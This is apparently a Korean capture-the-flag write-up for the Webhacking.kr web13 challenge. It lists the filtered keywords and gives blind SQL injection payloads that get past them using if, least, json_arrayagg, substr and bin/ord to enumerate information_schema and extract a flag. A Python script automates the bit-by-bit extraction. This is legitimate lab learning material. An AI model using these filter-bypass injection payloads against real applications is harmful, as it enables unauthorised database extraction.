Webhacking.kr - web13

web13

sql injection 문제

파라미터는 no이며 필터링 되는 것 : 공백, union, /, and, &&, like, =, >, where, group, ascii, hex, 0x *

필터링 안되는 것 : if, length, substr, select, ord, oct, sleep, %, .

Solution

우선 값이 뭐가 있는지 확인 -> ?no=if((select(count(no)))in(1),1,0) -> 1
no 컬럼에 값이 1 밖에 없는 듯함.

우리가 해야 할 일은 flag를 뽑아야 하므로 먼저 지금 테이블에 flag라는 컬럼이 있는지부터 확인 후 없다면
현재 db(아마 chall13)와 그 테이블 및 flag컬럼, flag컬럼의 값을 모두 알아내야 함.

먼저 현재 flag값이 들어있는 컬럼이 있는지 확인하고 싶었는데 방법을 못찾음..
그래서 그냥 다 뽑아서 보려고 함.

JSON_OBJECTAGG 함수로 group_concat 대체 가능함.
테스트해보니 사용자가 만든 table, column명이 먼저 나와서 빠르게 확인할 수 있을 것 같았는데..
결과를 보고나서 테스트를 해보니 ***한 테이블에 대한 컬럼이 2개 이상이면 하나만 나옴..***

tables : {"list": "no", "FILES": "FILE_ID", "VIEWS": "TABLE_CATALOG", "EVENTS": "EVENT_CATALOG

그래서 json_arrayagg로 변경해서 그냥 컬럼값만 뽑아보기로 함.. 

너무 오래 걸릴 것 같아서 least 함수를 이용해서 대략 어느 정도 길이인지 파악해서 정확한 길이를 구할 수 있음.
?no=if(least(length((select(json_arrayagg(column_name))from(information_schema.columns))),10)in(10),1,0)

길이는 10032! if(length((select(json_arrayagg(column_name))from(information_schema.columns)))in(10032),1,0) -> 1
앞에서 뽑기에는 너무 오래 걸리므로 예상해보면 거의 뒷쪽에 우리가 원하는 값이 있을 것이므로 10000부터 해보았고,
결국 flag 컬럼명을 알아낼 수 있었음!

columns : EF_COUNT", "flag_3a55b31d", "no"]

?no=if(length((select(flag_3a55b31d))),1,0) -> 0
다른 table에 있는지 확인해봄. 우선 길이를 구하면 10480

tables : "flag_ab733768", "list"]

table명은 flag_ab733768임.

?no=if(length((select(json_arrayagg(flag_3a55b31d))from(flag_ab733768))),1,0) -> 1
처음엔 값이 한 개인 줄 알고 안나와서 당황했는데 값이 여러개 인듯함.
값이 여러개여서 subquery returns more than 1 row 에러가 발생하게되어 0이 나온거였음!
길이는 39
따라서 플래그를 구하면 다음과 같음.

flags : ["flag", "FLAG{challenge13gummyclear}"]

사용한 mysql 함수 : length, bin, ord, substr, json_arrayagg, json_objectagg, least

least 함수는 사칙연산 필터링으로 인해 length 길이 비교를 대체하기 위해 사용.
json_objectagg, json_arrayagg 함수는 group_concat 함수를 대체하기 위해 사용.

새롭게 알게 된 사실
1. json_objectagg는 한 테이블에 2개 이상의 컬럼이 있으면 하나만 나온다는 것
2. json_arrayagg로 뽑아내면 사용자가 생성한 값은 뒷쪽에 있음.
3. group_concat이 되었어도 값이 안나왔을 수도 있음. test 환경에서 해보니 안나옴.

import requests

url='https://webhacking.kr/challenge/web-10/'
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies={'PHPSESSID':'[redacted]'} 

bit_len=''
bit_val=''
tables=''
columns=''
flags=''

for i in range(10000,10033) :
    #payload={'no':'if(length(bin(ord(substr((select(json_arrayagg(table_name))from(information_schema.columns)),'+str(i)+',1))))in(7),1,0)'}
    #payload={'no':'if(length(bin(ord(substr((select(json_arrayagg(column_name))from(information_schema.columns)),'+str(i)+',1))))in(7),1,0)'}
    payload={'no':'if(length(bin(ord(substr((select(json_arrayagg(flag_3a55b31d))from(flag_ab733768)),'+str(i)+',1))))in(7),1,0)'}
    res=requests.get(url, headers=headers, cookies=cookies, params=payload)
    if '<td>1</td>' in res.text :
        bit_len=7
    else :
        bit_len=6
   
    for j in range(1,bit_len+1):
        #payload={'no':'if(substr(bin(ord(substr((select(json_arrayagg(table_name))from(information_schema.columns)),'+str(i)+',1))),'+str(j)+',1)in(0),1,0)'}
        #payload={'no':'if(substr(bin(ord(substr((select(json_arrayagg(column_name))from(information_schema.columns)),'+str(i)+',1))),'+str(j)+',1)in(0),1,0)'}
        payload={'no':'if(substr(bin(ord(substr((select(json_arrayagg(flag_3a55b31d))from(flag_ab733768)),'+str(i)+',1))),'+str(j)+',1)in(0),1,0)'}
        res=requests.get(url, headers=headers, cookies=cookies, params=payload)
        if '<td>1</td>' in res.text :
            bit_val+='0'
        else :
            bit_val+='1'
           
    #tables+=chr(int(bit_val,2))
    #columns+=chr(int(bit_val,2))
    flags+=chr(int(bit_val,2))
    bit_val=''
    #print('tables :',tables)
    #print('columns :',columns)
    print('flags :',flags)